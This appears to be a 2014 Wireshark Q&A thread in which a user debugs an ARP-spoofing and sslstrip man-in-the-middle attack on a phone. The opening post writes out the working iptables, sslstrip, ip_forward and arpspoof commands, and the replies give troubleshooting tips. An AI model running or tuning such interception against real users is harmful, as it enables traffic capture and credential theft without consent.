I run: sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8095 sudo sslstrip -k -l 8095 then: sudo bash -c 'echo "1" > /proc/sys/net/ipv4/ip_forward' sudo arpspoof -i wlan0 -t 192.168.1.123 192.168.1.254 Then my victim (smartphone which I want to intercept connection to for fun) loses internet connection. I disabled firewall (I use ubuntu), but it is still the same. Why? By the way, connection is secured by wpa2 (i have preshared key obviously), maybe that's what causes it..? asked 03 May '14, 14:06  tttttttttttt2 edited 03 May '14, 14:09 |
One Answer:
WPA2 shouldn't pose a problem for ARP spoofing. Can you share a link to an uploaded packet capture file of this scenario (https://appliance.cloudshark.org/upload/ )? Your commands look right assuming IP info is correct. I'm not familiar with that sslstrip binary though, as I've only ever seen it as a python script. Assuming it's effectively the same as the normal sslstrip.py script, try adding the -f flag. I suggest doing this in parts to rule out what isn't working, too. First set up just arpspoof before forwarding, and make sure the victim can ping the 'gateway' and that you can see it reaching the attacker. If that works, move on to IP forwarding, verify that piece, then finally move to SSL stripping. That way you can at least isolate what part of the attack isn't working correctly rather than trying it all and saying the final result doesn't work. answered 03 May '14, 15:33  Quadratic edited 03 May '14, 15:33 showing 5 of 20 show 15 more comments |
@Quadratic: I did what you said and it stops working even when I run just arpspoof alone
Actually, I've flushed iptables and it kinda works. Except it doesn't work when https link is visited.
It actually works now, but no packets are captured when https is visited.
Using the python version of sslstrip, I can confirm this is a working method.
If you're saying it works but you don't see packets in the capture when specific sites are visited, I'm thinking it's got to be a problem with your trace. Keep in mind you're not looking for HTTPS toward the victim (so if that's what you don't see, it's not there to be seen).
@Quadratic: It mostly works I think. If I type gmail.com, it will show http version, it will not redirect. However, if I type https://gmail.com, it will give https
If you're still having issues with it you'll need to post a trace to see what's not working correctly, preferably of both sides of the middle-man.
@Quadratic And it should work? If a person visits https://gmail.com it should redirect to http://gmail.com?
What do you mean by trace?
By "trace", I mean a packet capture file (eg: .pcap file) showing the traffic to and from the proxy, to see what is failing (if anything is). I provided a URL where you can upload a trace file and share the link so that people here can look at it to see what may be going wrong. The redirect being supplied to the client, for example.
And did you add the -f flag to the sslstrip utility as I'd suggested?
@Quadratic: Yes, I did. I get lots of --- <exception caught="" here=""> --- File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger return callWithContext({"system": lp}, func, args, kw) File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext return context.call({ILogContext: newCtx}, func, *args, kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, args, kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext return func(*args,kw)
Also, do I need to setup wireshark differently somehow or something to see https?
It kinda works, because if I visit gmail.com while I am running these software, it doesn't redirect whereas other times it does. But if user types https:// it doesnt redirect to http
You don't need to set up wireshark differently to see HTTPS. Can you post that trace of the scenario where you are having a problem as I explained?
I am not sure, I think I explained everything :(
Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.dnslookuperror'="">: DNS lookup failed: address 'site.com' not found: [Errno -2] Name or service not known.
Here is a tutorial: https://www.youtube.com/watch?v=9PjmaPk20t8
For your error logs, I suggest approaching the owner of that binary file as I'm not familiar with it. With sslstrip.py that tutorial provides a working example.
Ah, just one thing to clarify here if it was a point of confusion: sslstrip will watch for a redirect to HTTPS and prevent it. It will not prevent a direct call to https://x.x.x.x.
@Quadratic: Yes, that's what I meant, direct https. Sorry for the confusion. What about sending fake certificates? Can you check my other topic where I discuss with Kurt (http://ask.wireshark.org/questions/32431/how-to-spoof-packets-send-fake-certificates) please?
Kurt is correct in the last answer he gave to your last question there. I'm not sure what more you would want as a response.